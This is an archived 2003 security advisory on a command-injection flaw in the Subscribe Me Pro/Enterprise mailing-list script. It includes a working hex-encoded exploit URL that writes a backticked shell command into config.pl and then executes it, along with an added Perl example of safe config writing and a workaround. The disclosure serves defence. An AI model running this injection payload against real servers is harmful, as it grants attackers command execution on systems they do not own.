[UNIX] Subscribe Me Pro/Enterprise Command Execution

From: SecuriTeam (support_at_securiteam.com)
Date: 12/22/03

    To: list@securiteam.com
    Date: 22 Dec 2003 12:10:11 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Subscribe Me Pro/Enterprise Command Execution
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.siteinteractive.com> Subscribe Me Pro/Enterprise is "a
    mailing list management script developed by siteinteractive". Various
    flaws exist in setup.pl that allow an attacker to inject shell commands
    into config.pl through a back-ticked variable injection flaw, and then
    to exploit a permission problem to execute config.pl.

    DETAILS

    Exploit:
    This attack tricks the Perl script setup.pl into thinking that you have
    just installed Subscribe Me and wish to set it up. When doing this,
    setup.pl will attempt to write all your configuration variables to
    config.pl. There is some input validation done in setup.pl, but it can
    be easily bypassed by hex encoding all data that you send.

    Run through of the exploit:
    First we connect and inject our exploit command of '/usr/bin/id > id' and
    tell setup.pl to create all files with a mode of 777.
    http://victim.com/cgi-bin/setup.pl?RUNINSTALLATION=yes&information=~&extension=pl&config=pl&permissions=777&os=notunixornt&perlpath=/usr/bin/perl&mailprog=/bin/sh&notification="%20.`%2F%75%73%72%2F%62%69%6E%2F%69%64%20%3E%20%69%64`%20."&websiteurl=evilhacker&br_username=evilhacker&session_id=0&cgipath=.

    This will return a page saying, "Please set your administration password"
    (you will not be able to).

    This has now written the following data to config.pl
    $notification = "" .`/usr/bin/id > id` . ""; (note the back ticks)

    Moreover, config.pl is now set to -rwxrwxrwx. Now we request
    http://victim.com/cgi-bin/config.pl to execute our perl.

    Accordingly, http://victim.com/cgi-bin/id is now created and contains:
    uid=48(apache) gid=48(apache) groups=48(apache)

    Using this exploit, it is possible to inject any system commands.
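    The advisory describes the flaw but not the code pattern behind it. The following is an added example (not the product's setup.pl and not the advisory author's code) that contrasts writing a decoded CGI value straight into generated Perl source with emitting it as an escaped single-quoted literal, plus an allowlist check applied after decoding; the function names and the allowlist regex are assumptions.

```perl
#!/usr/bin/perl
# Added example (not from the advisory or the product): why a value pasted
# into a generated Perl source file becomes code, and how a config writer
# should emit it instead.
use strict;
use warnings;

# Constructed value, as setup.pl would see it after CGI hex-decoding of the
# 'notification' parameter shown in the advisory.
my $input = q{" .`/usr/bin/id > id` . "};

# Unsafe pattern: interpolate the raw value inside double quotes. The embedded
# quote, concatenation dots and backticks are then parsed as Perl, so loading
# the generated config.pl runs the command. Returned here for display only.
sub unsafe_config_line {
    my ($value) = @_;
    return qq{\$notification = "$value";\n};
}

# Safe pattern: emit a single-quoted literal. Inside '...' only \ and ' are
# special, so escaping those two characters is sufficient.
sub safe_config_line {
    my ($value) = @_;
    (my $escaped = $value) =~ s/([\\'])/\\$1/g;
    return qq{\$notification = '$escaped';\n};
}

# Validate the decoded value against an allowlist (assumed pattern). A check
# that runs on the still-encoded query string, as described for setup.pl,
# is defeated by hex encoding.
sub notification_is_valid {
    my ($value) = @_;
    return $value =~ /\A[\w.@\- ]{1,64}\z/ ? 1 : 0;
}

print "unsafe line: ", unsafe_config_line($input);
print "safe line:   ", safe_config_line($input);
print "valid:       ", notification_is_valid($input), "\n";

# Round trip: loading the safely generated line restores the literal string,
# backticks included, without executing anything.
our $notification;
eval safe_config_line($input);
die $@ if $@;
print "round trip:  ", ($notification eq $input ? "ok" : "MISMATCH"), "\n";
```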

    Vendor status:
    Company was contacted via email (support@) on Monday 15 December, they
    were notified that the exploit would be released on 19 December, and they
    were told how to fix the problem. No reply was heard back from the
    company, and no official fix has been released.

    Workaround:
    Remove setup.pl once installation is complete; in addition, chmod config.pl to read-only.

    ADDITIONAL INFORMATION

    This advisory is also online at:
    http://www.pimp-industries.com/advsiory-0003.txt

    The information has been provided by
    <mailto:headpimp@pimp-industries.com> Paul Craig - Pimp Industries.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

